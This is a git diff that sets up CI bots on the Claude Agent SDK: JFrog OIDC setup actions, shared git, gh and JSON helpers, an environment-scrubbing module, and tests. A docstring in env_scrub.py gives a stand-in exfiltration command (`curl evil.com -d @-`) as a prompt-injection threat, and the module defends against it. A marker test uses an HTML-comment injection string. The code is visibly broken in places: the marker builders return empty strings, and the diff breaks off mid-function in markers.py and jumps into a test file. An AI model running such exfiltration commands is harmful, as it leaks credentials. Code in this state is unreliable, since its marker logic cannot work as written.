diff --git a/.github/actions/setup-claude-sdk/action.yml b/.github/actions/setup-claude-sdk/action.yml new file mode 100644 index 000000000..392404491 --- /dev/null +++ b/.github/actions/setup-claude-sdk/action.yml @@ -0,0 +1,54 @@ +# Copyright (c) 2025 ADBC Drivers Contributors +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. + +# Install the Claude Agent SDK (pip) + the Claude Code CLI (npm) that the bots +# now spawn, via Databricks' internal JFrog mirror. The protected runner group +# is egress-blocked from pypi.org and registry.npmjs.org, so this configures +# both package managers through JFrog (same mechanism as setup-jfrog / the +# sdk-smoke workflow, which is verified working end-to-end against the gateway). +# +# Requires `id-token: write` on the calling job (for the JFrog OIDC exchange). +# Idempotent w.r.t. a prior setup-jfrog step (re-exchanging the token + re- +# setting PIP_INDEX_URL is harmless). +name: Setup Claude Agent SDK +description: Install claude-agent-sdk (pip) + Claude Code CLI (npm) via the internal JFrog mirror. + +inputs: + requirements-file: + description: >- + Path to the SDK requirements file, relative to the job working directory + ($GITHUB_WORKSPACE — composite `run:` steps always execute there, not at + the caller's working-directory). Defaults to scripts/requirements-sdk.txt, + correct when the repo is checked out at the workspace root (e.g. the + reviewer bots). Workflows that check the repo into a subdir (the engineer + bots use `path: internal-repo`) MUST pass the prefixed path, e.g. + internal-repo/scripts/requirements-sdk.txt. + required: false + default: scripts/requirements-sdk.txt + +runs: + using: composite + steps: + - name: Setup Node (for the Claude Code CLI the SDK spawns) + uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0 + with: + node-version: '20' + + - name: Configure JFrog (pip + npm internal mirror) + uses: ./.github/actions/setup-jfrog + with: + configure-pip: 'true' + configure-npm: 'true' + + - name: Install claude-agent-sdk + Claude Code CLI + shell: bash + run: | + python -m pip install --upgrade pip + # Install the SDK from the documented requirements file (not a bare + # `pip install claude-agent-sdk`) so CI and local docs share one + # dependency source and future pins land in a single place. (Review) + pip install -r "${{ inputs.requirements-file }}" + npm i -g @anthropic-ai/claude-code + echo "claude CLI: $(command -v claude || echo 'NOT FOUND')" diff --git a/.github/actions/setup-jfrog/setup-jfrog/action.yml b/.github/actions/setup-jfrog/setup-jfrog/action.yml new file mode 100644 index 000000000..8b6bf290f --- /dev/null +++ b/.github/actions/setup-jfrog/setup-jfrog/action.yml @@ -0,0 +1,78 @@ +name: Setup JFrog OIDC +description: Obtain a JFrog access token via GitHub OIDC and configure package managers + +inputs: + configure-pip: + description: Configure pip to use JFrog PyPI proxy + default: "true" + configure-cargo: + description: Configure Cargo to use JFrog crates proxy + default: "false" + configure-npm: + description: Configure npm to use JFrog npm proxy + default: "false" + +runs: + using: composite + steps: + - name: Get JFrog OIDC token + shell: bash + run: | + set -euo pipefail + ID_TOKEN=$(curl -sLS \ + -H "User-Agent: actions/oidc-client" \ + -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \ + "${ACTIONS_ID_TOKEN_REQUEST_URL}&audience=jfrog-github" | jq .value | tr -d '"') + echo "::add-mask::${ID_TOKEN}" + ACCESS_TOKEN=$(curl -sLS -XPOST -H "Content-Type: application/json" \ + "https://databricks.jfrog.io/access/api/v1/oidc/token" \ + -d "{\"grant_type\": \"urn:ietf:params:oauth:grant-type:token-exchange\", \"subject_token_type\":\"urn:ietf:params:oauth:token-type:id_token\", \"subject_token\": \"${ID_TOKEN}\", \"provider_name\": \"github-actions\"}" | jq .access_token | tr -d '"') + echo "::add-mask::${ACCESS_TOKEN}" + if [ -z "$ACCESS_TOKEN" ] || [ "$ACCESS_TOKEN" = "null" ]; then + echo "FAIL: Could not extract JFrog access token" + exit 1 + fi + echo "JFROG_ACCESS_TOKEN=${ACCESS_TOKEN}" >> "$GITHUB_ENV" + echo "JFrog OIDC token obtained successfully" + + - name: Configure pip + if: inputs.configure-pip == 'true' + shell: bash + run: | + set -euo pipefail + echo "PIP_INDEX_URL=https://gha-service-account:${JFROG_ACCESS_TOKEN}@databricks.jfrog.io/artifactory/api/pypi/db-pypi/simple" >> "$GITHUB_ENV" + echo "pip configured to use JFrog registry" + + - name: Configure Cargo + if: inputs.configure-cargo == 'true' + shell: bash + run: | + set -euo pipefail + mkdir -p ~/.cargo + cat > ~/.cargo/config.toml << EOF + [source.crates-io] + replace-with = "jfrog" + [source.jfrog] + registry = "sparse+https://databricks.jfrog.io/artifactory/api/cargo/db-cargo-remote/index/" + [registries.jfrog] + index = "sparse+https://databricks.jfrog.io/artifactory/api/cargo/db-cargo-remote/index/" + credential-provider = ["cargo:token"] + EOF + cat > ~/.cargo/credentials.toml << EOF + [registries.jfrog] + token = "Bearer ${JFROG_ACCESS_TOKEN}" + EOF + echo "CARGO_REGISTRIES_JFROG_TOKEN=Bearer ${JFROG_ACCESS_TOKEN}" >> "$GITHUB_ENV" + echo "Cargo configured to use JFrog registry" + + - name: Configure npm + if: inputs.configure-npm == 'true' + shell: bash + run: | + set -euo pipefail + cat > ~/.npmrc << EOF + registry=https://databricks.jfrog.io/artifactory/api/npm/db-npm/ + //databricks.jfrog.io/artifactory/api/npm/db-npm/:_authToken=${JFROG_ACCESS_TOKEN} + always-auth=true + EOF + echo "npm configured to use JFrog registry" diff --git a/.github/workflows/sdk-smoke.yml b/.github/workflows/sdk-smoke.yml new file mode 100644 index 000000000..516a70915 --- /dev/null +++ b/.github/workflows/sdk-smoke.yml @@ -0,0 +1,39 @@ +# Reviewer-bot foundation smoke test. +# +# Manual-only (workflow_dispatch). Verifies the one infra unknown for the +# reviewer-bot foundation on this repo: that the Claude Agent SDK (pip) + the +# Claude Code CLI (npm) install on the protected runner via Databricks' internal +# JFrog mirror (the runner group is egress-blocked from pypi.org/npmjs.org). +# No secrets required — only the JFrog OIDC token exchange (id-token: write). +name: SDK Smoke (reviewer-bot foundation) + +on: + workflow_dispatch: + +permissions: + contents: read + id-token: write # JFrog OIDC token exchange for the internal pip/npm mirror + +jobs: + smoke: + runs-on: + group: databricks-protected-runner-group + labels: [linux-ubuntu-latest] + timeout-minutes: 15 + steps: + - name: Checkout + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Setup Python + uses: actions/setup-python@a309ff8b426b58ec0e2a45f0f869d46889d02405 # v6.2.0 + with: + python-version: '3.11' + + - name: Setup Claude Agent SDK + CLI + uses: ./.github/actions/setup-claude-sdk + + - name: Verify SDK + CLI are importable/spawnable + run: | + python -c "import claude_agent_sdk; print('claude_agent_sdk import OK')" + echo "claude CLI: $(command -v claude || echo 'NOT FOUND')" + claude --version || true diff --git a/scripts/__init__.py b/scripts/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/scripts/requirements-sdk.txt b/scripts/requirements-sdk.txt new file mode 100644 index 000000000..a77900b59 --- /dev/null +++ b/scripts/requirements-sdk.txt @@ -0,0 +1,23 @@ +# Claude Agent SDK migration dependencies (PoC). +# +# Replaces the hand-rolled LLM transport + tool-use loop +# (scripts/engineer_bot/agent_runner.py, scripts/shared/llm_client.py) +# with the Claude Agent SDK. See docs/migration/claude-agent-sdk-migration.md. +# +# IMPORTANT: the SDK spawns the Claude Code CLI under the hood. The CLI +# must be on PATH in any environment that calls sdk_agent.run_agent +# (CI runners + local dev). Install it once, globally, via npm: +# +# npm i -g @anthropic-ai/claude-code +# +# The CLI is NOT a pip package; it cannot be pinned here. CI workflows +# (engineer-bot.yml, reviewer-bot.yml, *-followup.yml) must add an install +# + npm-cache step before invoking any bot that uses the SDK. +# +# Endpoint config (set by sdk_agent.configure_databricks_env at runtime, +# derived from the existing MODEL_ENDPOINT / DATABRICKS_TOKEN workflow env): +# ANTHROPIC_BASE_URL = /serving-endpoints/anthropic +# ANTHROPIC_AUTH_TOKEN = $DATABRICKS_TOKEN # NOT ANTHROPIC_API_KEY +# ANTHROPIC_MODEL = databricks-claude-opus-4-8 + +claude-agent-sdk diff --git a/scripts/shared/__init__.py b/scripts/shared/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/scripts/shared/env_scrub.py b/scripts/shared/env_scrub.py new file mode 100644 index 000000000..4cf318020 --- /dev/null +++ b/scripts/shared/env_scrub.py @@ -0,0 +1,52 @@ +"""Strip credential-shaped env vars before exec'ing subprocesses. + +Canonical home for the env-scrub regex table (relocated here from +``scripts/engineer_bot/env_scrub.py`` during the Claude Agent SDK migration, +PR1). The shared SDK modules (``sdk_agent``, ``sdk_security``) import from +here so they carry NO dependency on ``engineer_bot``; ``engineer_bot/env_scrub`` +is now a thin re-export shim, so PR6 can delete that shim as a pure deletion +without touching this load-bearing table. + +The bash tool inherits the workflow's env which contains DATABRICKS_TOKEN, +GitHub App tokens, etc. Subprocesses launched by the agent must not see +these — a malicious prompt injection that gets the agent to `curl +evil.com -d @-` then read from stdin can't exfiltrate what isn't there. +""" +from __future__ import annotations + +import re + +_REDACT_PATTERNS = ( + re.compile(r".*TOKEN.*", re.IGNORECASE), + re.compile(r".*SECRET.*", re.IGNORECASE), + re.compile(r".*PASSWORD.*", re.IGNORECASE), + re.compile(r".*API_KEY.*", re.IGNORECASE), + # Broader patterns covering cloud credential conventions that + # don't include the four magic substrings above. + re.compile(r".*PRIVATE.*", re.IGNORECASE), + re.compile(r".*CREDENTIAL.*", re.IGNORECASE), + re.compile(r".*OAUTH.*", re.IGNORECASE), + re.compile(r".*ACCESS_KEY.*", re.IGNORECASE), + re.compile(r".*SECRET_KEY.*", re.IGNORECASE), + # Specific named vars that don't match the substring patterns + # above. NOTE: we deliberately do NOT use blanket prefix patterns + # like `^DATABRICKS_.*`, `^AWS_.*`, `^AZURE_.*` — those would + # strip non-credential config vars (e.g. DATABRICKS_TEST_CONFIG_FILE + # which the bash tool's dotnet-test invocation reads). + # DATABRICKS_TOKEN, DATABRICKS_OAUTH_CLIENT_SECRET etc. are caught + # by the substring patterns above. + re.compile(r"^AWS_ACCESS_KEY_ID$", re.IGNORECASE), + re.compile(r"^GOOGLE_APPLICATION_CREDENTIALS$", re.IGNORECASE), + re.compile(r"^KUBECONFIG$", re.IGNORECASE), + re.compile(r"^SSH_AUTH_SOCK$", re.IGNORECASE), + re.compile(r"^AZURE_TENANT_ID$", re.IGNORECASE), + re.compile(r"^AZURE_CLIENT_ID$", re.IGNORECASE), +) + + +def scrub(env: dict[str, str]) -> dict[str, str]: + """Return a new dict with credential-shaped keys removed.""" + return { + k: v for k, v in env.items() + if not any(p.match(k) for p in _REDACT_PATTERNS) + } diff --git a/scripts/shared/git_ops.py b/scripts/shared/git_ops.py new file mode 100644 index 000000000..e829f44a6 --- /dev/null +++ b/scripts/shared/git_ops.py @@ -0,0 +1,83 @@ +"""Thin wrappers around `git` for bot workflows.""" +from __future__ import annotations + +import subprocess +import sys +from pathlib import Path +from typing import Optional + + +def configure_user(cwd: Path, email: str, name: str) -> None: + subprocess.run(["git", "config", "user.email", email], cwd=cwd, check=True) + subprocess.run(["git", "config", "user.name", name], cwd=cwd, check=True) + + +def commit_paths(cwd: Path, paths: list[str], message: str) -> bool: + """Stage the given paths and create a commit. Returns False if nothing staged.""" + subprocess.run(["git", "add", *paths], cwd=cwd, check=True) + diff = subprocess.run(["git", "diff", "--cached", "--quiet"], cwd=cwd) + if diff.returncode == 0: + return False # nothing staged + if diff.returncode != 1: + # git diff --quiet documents 0 (no diff) / 1 (diff). Anything else + # is an error — fail loud rather than committing on a broken repo. + raise RuntimeError( + f"git diff --cached --quiet returned unexpected code {diff.returncode}; " + f"refusing to commit" + ) + subprocess.run(["git", "commit", "-m", message], cwd=cwd, check=True) + return True + + +def push( + cwd: Path, + branch: str, + remote: str = "origin", + *, + force_with_lease: bool = False, + expected_sha: Optional[str] = None, +) -> None: + """Push a branch to `remote`. + + Default is a plain push that fails on non-fast-forward. + + `force_with_lease=True` without `expected_sha` is unsafe in CI + (background fetches by actions/checkout refresh the lease ref, so + the lease check degenerates to `--force`). When you need force-push + behavior, pass `expected_sha` — the lease will be qualified with + `:` so it actually protects against races. + """ + if force_with_lease and not expected_sha: + # Fail loud rather than silently constructing the risky + # unqualified --force-with-lease command. Callers that really + # want to force-push must compute the expected remote SHA + # first (via `git ls-remote`) and pass it explicitly. + raise ValueError( + "push(force_with_lease=True) requires expected_sha. Unqualified " + "--force-with-lease degrades to --force in CI because background " + "fetches refresh the lease ref. Pass the expected remote SHA or " + "use a plain push." + ) + cmd = ["git", "push", remote, branch] + if force_with_lease: + cmd.insert(2, f"--force-with-lease={branch}:{expected_sha}") + try: + r = subprocess.run( + cmd, cwd=cwd, check=True, + capture_output=True, text=True, + ) + except subprocess.CalledProcessError as e: + # Re-raise with the captured stderr so callers can include it + # in their failure messages. Print to the workflow log first so + # the trace is visible even if the caller doesn't surface stderr. + if e.stdout: + print(e.stdout, end="") + if e.stderr: + print(e.stderr, end="", file=sys.stderr) + raise + + +def current_sha(cwd: Path) -> str: + r = subprocess.run(["git", "rev-parse", "HEAD"], cwd=cwd, + capture_output=True, text=True, check=True) + return r.stdout.strip() diff --git a/scripts/shared/github_ops.py b/scripts/shared/github_ops.py new file mode 100644 index 000000000..1bef0326f --- /dev/null +++ b/scripts/shared/github_ops.py @@ -0,0 +1,73 @@ +"""Thin wrappers around the `gh` CLI for bot workflows. + +Auth comes from the GH_TOKEN env var that callers must set (usually +to a GitHub App installation token). Network errors propagate. +""" +from __future__ import annotations + +import json +import subprocess +from typing import Any + + +def _run_gh(*args: str, paginate: bool = False) -> str: + """Run `gh` with the given args, return stdout. On failure, raise + RuntimeError with stderr included so it shows up in workflow logs. + """ + cmd = ["gh", *args] + if paginate: + # Insert --paginate after the subcommand (e.g. `gh api --paginate ...`) + cmd.insert(2, "--paginate") + try: + r = subprocess.run(cmd, capture_output=True, text=True, check=True) + except subprocess.CalledProcessError as e: + raise RuntimeError( + f"gh failed (exit {e.returncode}): {' '.join(cmd)}\n" + f"stderr: {e.stderr.strip()}" + ) from e + return r.stdout + + +def fetch_pr(repo: str, pr_number: int) -> dict[str, Any]: + out = _run_gh( + "pr", "view", str(pr_number), "--repo", repo, "--json", + "title,body,url,headRefName,headRefOid,baseRefName,isCrossRepository", + ) + return json.loads(out) + + +def fetch_review_comment(repo: str, comment_id: int) -> dict[str, Any]: + out = _run_gh("api", f"repos/{repo}/pulls/comments/{comment_id}") + return json.loads(out) + + +def list_pr_review_comments(repo: str, pr_number: int) -> list[dict[str, Any]]: + out = _run_gh("api", f"repos/{repo}/pulls/{pr_number}/comments", paginate=True) + return json.loads(out) + + +def post_inline_reply(repo: str, pr_number: int, in_reply_to: int, body: str) -> int: + out = _run_gh( + "api", "-X", "POST", + f"repos/{repo}/pulls/{pr_number}/comments", + "-f", f"body={body}", + "-F", f"in_reply_to={in_reply_to}", + ) + return json.loads(out)["id"] + + +def post_pr_comment(repo: str, pr_number: int, body: str) -> int: + out = _run_gh( + "api", "-X", "POST", + f"repos/{repo}/issues/{pr_number}/comments", + "-f", f"body={body}", + ) + return json.loads(out)["id"] + + +def resolve_thread(repo: str, thread_id: str) -> None: + query = ( + "mutation($id: ID!) { resolveReviewThread(input: {threadId: $id}) " + "{ thread { id isResolved } } }" + ) + _run_gh("api", "graphql", "-f", f"query={query}", "-f", f"id={thread_id}") diff --git a/scripts/shared/json_utils.py b/scripts/shared/json_utils.py new file mode 100644 index 000000000..6a8c92220 --- /dev/null +++ b/scripts/shared/json_utils.py @@ -0,0 +1,118 @@ +"""JSON-extraction helpers for parsing LLM responses. + +Relocated from ``scripts/shared/llm_client.py`` as part of the Claude +Agent SDK migration (see ``docs/migration/claude-agent-sdk-migration.md``, +PR1). ``llm_client.py`` is gutted once every caller routes through the SDK; +this parse helper survives because the SDK delivers tool-call args +structured, but some response shapes (and the reviewer-bot ``finalize_review`` +fallback) still need brace-balanced JSON extraction from free text. + +``llm_client`` re-exports ``ParseError`` / ``extract_json_block`` from here +so existing imports keep working unchanged. +""" +from __future__ import annotations + +import json +from typing import Any + + +class ParseError(ValueError): + """The model's response could not be parsed into a JSON object.""" + + +def extract_json_block(text: str) -> dict[str, Any]: + """Extract a JSON object from the model's response. + + Robust against three common model behaviors: + - Pure JSON output (no prose, no fence). + - JSON wrapped in a ```json fence (legacy; the prompt no longer + requires fences, but the model may still add them). + - JSON containing nested ``` blocks inside string values (e.g., + a `suggestion` field with a ```suggestion fenced code block). + Regex-based extraction breaks on this; brace-balancing does not. + - Multiple top-level JSON objects in the same response (e.g., + the model echoes the schema example before emitting its + actual answer). The LAST balanced object is returned. + + Raises ParseError if no parseable JSON object is found. + """ + text = text.strip() + if not text: + raise ParseError("Empty response") + + # Fast path: response is pure JSON. + try: + result = json.loads(text) + if isinstance(result, dict): + return result + except json.JSONDecodeError: + pass + + # Slow path: scan for balanced top-level {…} regions and try each + # from last to first. String state is tracked so braces / backticks + # inside string values don't confuse the matcher. + candidates = _find_balanced_objects(text) + if not candidates: + raise ParseError("No parseable JSON object in response") + + last_err: Exception | None = None + for start, end in reversed(candidates): + try: + obj = json.loads(text[start:end + 1]) + if isinstance(obj, dict): + return obj + except json.JSONDecodeError as e: + last_err = e + continue + raise ParseError( + f"All {len(candidates)} candidate JSON blocks failed to parse: " + f"{last_err}" + ) + + +def _find_balanced_objects(text: str) -> list[tuple[int, int]]: + """Return (start, end) offsets of every balanced {…} region in text. + Tracks string state (with escape handling) so braces inside string + values do not affect depth. + """ + out: list[tuple[int, int]] = [] + i = 0 + n = len(text) + while i < n: + if text[i] == "{": + end = _balanced_brace_end(text, i) + if end != -1: + out.append((i, end)) + i = end + 1 + continue + i += 1 + return out + + +def _balanced_brace_end(text: str, start: int) -> int: + """Return index of the matching '}' for the '{' at text[start], or + -1 if unbalanced. String state tracking ignores braces inside + JSON string literals (handles escaped quotes and backslashes).""" + depth = 0 + in_string = False + escape = False + for i in range(start, len(text)): + ch = text[i] + if escape: + escape = False + continue + if in_string: + if ch == "\\": + escape = True + elif ch == '"': + in_string = False + continue + if ch == '"': + in_string = True + elif ch == "{": + depth += 1 + elif ch == "}": + depth -= 1 + if depth == 0: + return i + return -1 diff --git a/scripts/shared/llm_client.py b/scripts/shared/llm_client.py new file mode 100644 index 000000000..b3b6258bc --- /dev/null +++ b/scripts/shared/llm_client.py @@ -0,0 +1,21 @@ +"""Backwards-compat shim: JSON-extraction helpers relocated to json_utils. + +Historically this module held the hand-rolled Databricks Model Serving client +(``call_llm``, OpenAI-format ``TOOLS_SCHEMA``) and the brace-balanced JSON +extractor. The Claude Agent SDK migration removed the transport + tool schema +— every caller now routes through ``scripts.shared.sdk_agent`` + the in-process +``@tool`` servers — and the JSON helpers moved to +``scripts/shared/json_utils.py``. + +This module survives ONLY as a re-export of ``ParseError`` / +``extract_json_block`` so existing imports +(`from scripts.shared.llm_client import extract_json_block`) keep working. New +code should import from ``scripts.shared.json_utils`` directly. +""" +from __future__ import annotations + +# Re-exported for backwards compatibility; canonical home is json_utils. +from scripts.shared.json_utils import ( # noqa: F401 + ParseError, + extract_json_block, +) diff --git a/scripts/shared/markers.py b/scripts/shared/markers.py new file mode 100644 index 000000000..27e3eaa10 --- /dev/null +++ b/scripts/shared/markers.py @@ -0,0 +1,75 @@ +"""Generic HTML marker builders for bot comments. + +Posting under `github-actions[bot]` is shared across all workflows in +this repo. Markers disambiguate which bot a comment belongs to. Each +bot picks a namespace ("reviewer-bot", "engineer-bot", etc.) and uses +the helpers below. +""" +from __future__ import annotations + +import re + +_VERSION = "v1" + +_ID_ALLOWED = re.compile(r"[^A-Za-z0-9_.\-]") +_ID_MAX_LEN = 40 + + +def _sanitize_id(value) -> str: + s = str(value) if value is not None else "" + s = _ID_ALLOWED.sub("", s)[:_ID_MAX_LEN] + return s or "unknown" + + +def marker(namespace: str, kind: str) -> str: + return f"" + + +def marker_with_id(namespace: str, kind: str, id_value) -> str: + return f"" + + +def has_marker(body: str, namespace: str, kind: str) -> bool: + """True iff `body` contains the exact marker on an unquoted line. + + See `has_any_marker` for the rationale on the quoted-line filter + — the same false-positive applies to specific-kind matches.""" + needle = marker(namespace, kind) + return _scan_unquoted_lines(body, needle) + + +def has_any_marker(body: str, namespace: str) -> bool: + """True iff `body` contains an active marker for `namespace`. + + "Active" means the marker appears on a line that is NOT a markdown + blockquote (lines beginning with `>`, optionally indented). When a + reviewer quotes a bot's prior reply via GitHub's blockquote syntax, + the quoted text — INCLUDING the trailing HTML-comment marker — + appears in the reviewer's reply body. A naive substring check + misclassifies that reviewer reply as bot-authored, which suppresses + re-engagement in `find_unaddressed_threads` and breaks the + own-reply loop guard in both bots' followup workflows. + + Filtering out `>`-prefixed lines covers the common case. We do + NOT (yet) parse fenced code blocks (```...```); a marker inside a + code fence is rare in real reviewer text and the existing reply + cap bounds the damage even if it slipped through. + """ + if not body: + return False + needle = f"" + + def test_marker_with_id_sanitization(self): + # Sanitization strips `>` (and any other char outside [A-Za-z0-9_.-]) + # but KEEPS `-` so ids like F1-followup survive. The security + # invariant is that the marker contains exactly one `-->` (the + # closer), which is guaranteed by stripping `>`. + m = markers.marker_with_id("engineer-bot", "followup", "F1-->evil") + assert m.count("-->") == 1 + assert m.endswith("-->") + # No injected HTML in the id portion (the marker itself starts + # with `" in m + + def test_marker_with_id_empty_falls_back(self): + m = markers.marker_with_id("ns", "k", "") + assert "id=unknown" in m + + def test_marker_with_id_none_falls_back(self): + m = markers.marker_with_id("ns", "k", None) + assert "id=unknown" in m + + def test_has_marker_substring_match(self): + body = "Some text\n\nMore" + assert markers.has_marker(body, "engineer-bot", "fix-push") + assert not markers.has_marker(body, "engineer-bot", "review") + assert not markers.has_marker(body, "other-bot", "fix-push") + + def test_has_any_marker_for_namespace(self): + body = "" + assert markers.has_any_marker(body, "engineer-bot") + assert not markers.has_any_marker(body, "reviewer-bot") + + def test_has_any_marker_skips_blockquoted_line(self): + """When a reviewer quotes the bot's prior reply via GitHub's + blockquote syntax (`>` prefix), the quoted body — including + the marker — appears in the reviewer's reply. has_any_marker + must NOT match those quoted markers, otherwise the reviewer's + reply is misclassified as bot-authored and suppresses + re-engagement / breaks the own-reply loop guards.""" + body = ( + "Reviewer's reply:\n" + "> previous bot text\n" + "> \n" + ) + assert markers.has_any_marker(body, "engineer-bot") is False + + def test_has_any_marker_matches_indented_quote_too(self): + """Markdown allows leading whitespace before `>` in nested + quotes. The skip must apply regardless of indent.""" + body = "Outer:\n > \n" + assert markers.has_any_marker(body, "engineer-bot") is False + + def test_has_any_marker_finds_marker_alongside_quote(self): + """If a body has BOTH a quoted (irrelevant) marker AND an + unquoted (active) marker, the active one wins.""" + body = ( + "> \n" + "\n" + ) + assert markers.has_any_marker(body, "engineer-bot") is True + + def test_has_marker_skips_blockquoted_line(self): + """Same blockquote rule applies to `has_marker` (specific + kind), since the same false-positive surface exists.""" + body = "> \n" + assert markers.has_marker(body, "engineer-bot", "fix-push") is False diff --git a/scripts/shared/tests/test_sdk_agent.py b/scripts/shared/tests/test_sdk_agent.py new file mode 100644 index 000000000..625b6f8f4 --- /dev/null +++ b/scripts/shared/tests/test_sdk_agent.py @@ -0,0 +1,369 @@ +"""Tests for sdk_agent endpoint translation + env configuration. + +These cover the pure, SDK-independent surface of sdk_agent (the part that +does NOT require claude_agent_sdk to be installed): translate_endpoint and +configure_databricks_env. The agent-loop itself is exercised by the live +PR1 smoke test (tools/sdk_smoke.py), not here. +""" +import os + +import pytest + +from scripts.shared import sdk_agent + + +# ── translate_endpoint: derived from csharp_coverage/initial.py:_translate_endpoint ── +# (shares the v1->v2 workspace rewrite, but intentionally diverges: fail-closed +# on empty/unrecognized input + strips a trailing /v1/messages — see below) + +def test_translate_v1_invocations_url(): + src = "https://ws.azuredatabricks.net/serving-endpoints/databricks-claude-opus-4-7/invocations" + assert sdk_agent.translate_endpoint(src) == ( + "https://ws.azuredatabricks.net/serving-endpoints/anthropic" + ) + + +def test_translate_already_v2_base_passthrough(): + src = "https://ws.azuredatabricks.net/serving-endpoints/anthropic" + assert sdk_agent.translate_endpoint(src) == src + + +def test_translate_strips_trailing_v1_messages(): + """The CLI re-appends /v1/messages, so a base that already carries it + must be normalised back to the bare base (avoids double-append).""" + src = "https://ws.azuredatabricks.net/serving-endpoints/anthropic/v1/messages" + assert sdk_agent.translate_endpoint(src) == ( + "https://ws.azuredatabricks.net/serving-endpoints/anthropic" + ) + + +def test_translate_strips_trailing_slash(): + src = "https://ws.azuredatabricks.net/serving-endpoints/some-model/invocations/" + assert sdk_agent.translate_endpoint(src) == ( + "https://ws.azuredatabricks.net/serving-endpoints/anthropic" + ) + + +def test_translate_empty_fails_closed(): + """Empty / unparseable input must return '' (not a bogus relative + '/serving-endpoints/anthropic') so run_agent never sets a malformed + ANTHROPIC_BASE_URL.""" + assert sdk_agent.translate_endpoint("") == "" + assert sdk_agent.translate_endpoint(" ") == "" + assert sdk_agent.translate_endpoint("https://ws.net/no/serving/here") == "" + + +# ── configure_databricks_env ── + +@pytest.fixture +def clean_env(monkeypatch): + for k in ( + "ANTHROPIC_BASE_URL", "ANTHROPIC_AUTH_TOKEN", "ANTHROPIC_MODEL", + "ANTHROPIC_API_KEY", "MODEL_ENDPOINT", "DATABRICKS_TOKEN", + ): + monkeypatch.delenv(k, raising=False) + return monkeypatch + + +def test_configure_sets_all_three_anthropic_vars(clean_env): + sdk_agent.configure_databricks_env( + "databricks-claude-opus-4-7", + endpoint="https://ws.net/serving-endpoints/m/invocations", + token="dapi-secret", + ) + assert os.environ["ANTHROPIC_BASE_URL"] == "https://ws.net/serving-endpoints/anthropic" + assert os.environ["ANTHROPIC_AUTH_TOKEN"] == "dapi-secret" + assert os.environ["ANTHROPIC_MODEL"] == "databricks-claude-opus-4-7" + + +def test_configure_never_sets_api_key(clean_env): + """Databricks uses Bearer auth via ANTHROPIC_AUTH_TOKEN, NOT the + ANTHROPIC_API_KEY name.""" + sdk_agent.configure_databricks_env( + "m", endpoint="https://ws.net/serving-endpoints/m/invocations", token="t" + ) + assert "ANTHROPIC_API_KEY" not in os.environ + + +def test_configure_falls_back_to_process_env(clean_env): + clean_env.setenv("MODEL_ENDPOINT", "https://ws.net/serving-endpoints/m/invocations") + clean_env.setenv("DATABRICKS_TOKEN", "from-env") + sdk_agent.configure_databricks_env("m") + assert os.environ["ANTHROPIC_BASE_URL"] == "https://ws.net/serving-endpoints/anthropic" + assert os.environ["ANTHROPIC_AUTH_TOKEN"] == "from-env" + + +# ── _classify_http_error: must NOT match incidental numbers (review F1/F2) ── + +def test_classify_matches_http_context(): + assert sdk_agent._classify_http_error(Exception("HTTP 429 Too Many Requests")) == 429 + assert sdk_agent._classify_http_error(Exception("status: 503")) == 503 + assert sdk_agent._classify_http_error(Exception("code=500")) == 500 + + +def test_classify_ignores_incidental_numbers(): + """A bare 3-digit number with no HTTP/status/code context must NOT be + mistaken for a status code (would spuriously skip the retrospective).""" + for msg in ("connection reset after 500ms", "port 5000 unavailable", + "line 412 in foo.py", "retry budget 4000"): + assert sdk_agent._classify_http_error(Exception(msg)) is None + + +def test_classify_prefers_structured_attr(): + exc = Exception("opaque transport failure") + exc.status_code = 502 # type: ignore[attr-defined] + assert sdk_agent._classify_http_error(exc) == 502 + + +# ── _merge_coding_agent_header: must never DROP our header (review F3) ── + +def test_merge_header_sets_when_absent(): + env = {} + sdk_agent._merge_coding_agent_header(env) + assert env["ANTHROPIC_CUSTOM_HEADERS"] == sdk_agent.DATABRICKS_CODING_AGENT_HEADER + + +def test_merge_header_appends_to_unrelated_value(): + """A caller's pre-existing header must NOT drop the coding-agent opt-in + (a plain setdefault would — reproducing the 400 this fixes).""" + env = {"ANTHROPIC_CUSTOM_HEADERS": "x-trace-id: abc"} + sdk_agent._merge_coding_agent_header(env) + val = env["ANTHROPIC_CUSTOM_HEADERS"] + assert "x-trace-id: abc" in val + assert "x-databricks-use-coding-agent-mode" in val + + +def test_merge_header_idempotent(): + env = {"ANTHROPIC_CUSTOM_HEADERS": "x-databricks-use-coding-agent-mode: true"} + sdk_agent._merge_coding_agent_header(env) + assert env["ANTHROPIC_CUSTOM_HEADERS"].count("coding-agent-mode") == 1 + + +def test_merge_header_appends_when_set_to_false(): + """A caller who set the header to `false` must still get the `: true` + opt-in appended (presence check matches the full name: true). (Review F11/F14)""" + env = {"ANTHROPIC_CUSTOM_HEADERS": "x-databricks-use-coding-agent-mode: false"} + sdk_agent._merge_coding_agent_header(env) + assert "x-databricks-use-coding-agent-mode: true" in env["ANTHROPIC_CUSTOM_HEADERS"] + + +def test_maybe_raise_http_error_uses_api_error_status(): + """_maybe_raise_http_error reads the structured api_error_status first + (confirmed present on ResultMessage by the smoke probe), not just the + message regex. (Review — doc:62)""" + from types import SimpleNamespace + msg = SimpleNamespace(is_error=True, api_error_status=503, result="overloaded", subtype="error") + try: + sdk_agent._maybe_raise_http_error(msg) + assert False, "expected _HttpError" + except sdk_agent._HttpError as e: + assert e.code == 503 + # No error → no raise. + ok = SimpleNamespace(is_error=False, api_error_status=None, result="OK") + sdk_agent._maybe_raise_http_error(ok) # must not raise + + +def test_record_tool_use_handles_mcp_qualified_names(): + """The SDK reports in-process @tool names fully-qualified + (mcp__engineer-tools__edit_file). _record_tool_use must still populate + touched_files / bash_invocations or the write-scope gate goes blind. + (Review — initial.py:279)""" + r = sdk_agent.AgentResult() + sdk_agent._record_tool_use(r, "mcp__engineer-tools__edit_file", {"path": "tests/x.cs"}) + sdk_agent._record_tool_use(r, "mcp__engineer-tools__bash", {"command": "dotnet build"}) + assert r.touched_files == ["tests/x.cs"] + assert r.bash_invocations == [{"cmd": "dotnet build"}] + # Built-in (unqualified) names still work. + r2 = sdk_agent.AgentResult() + sdk_agent._record_tool_use(r2, "Edit", {"file_path": "a.py"}) + assert r2.touched_files == ["a.py"] + + +def 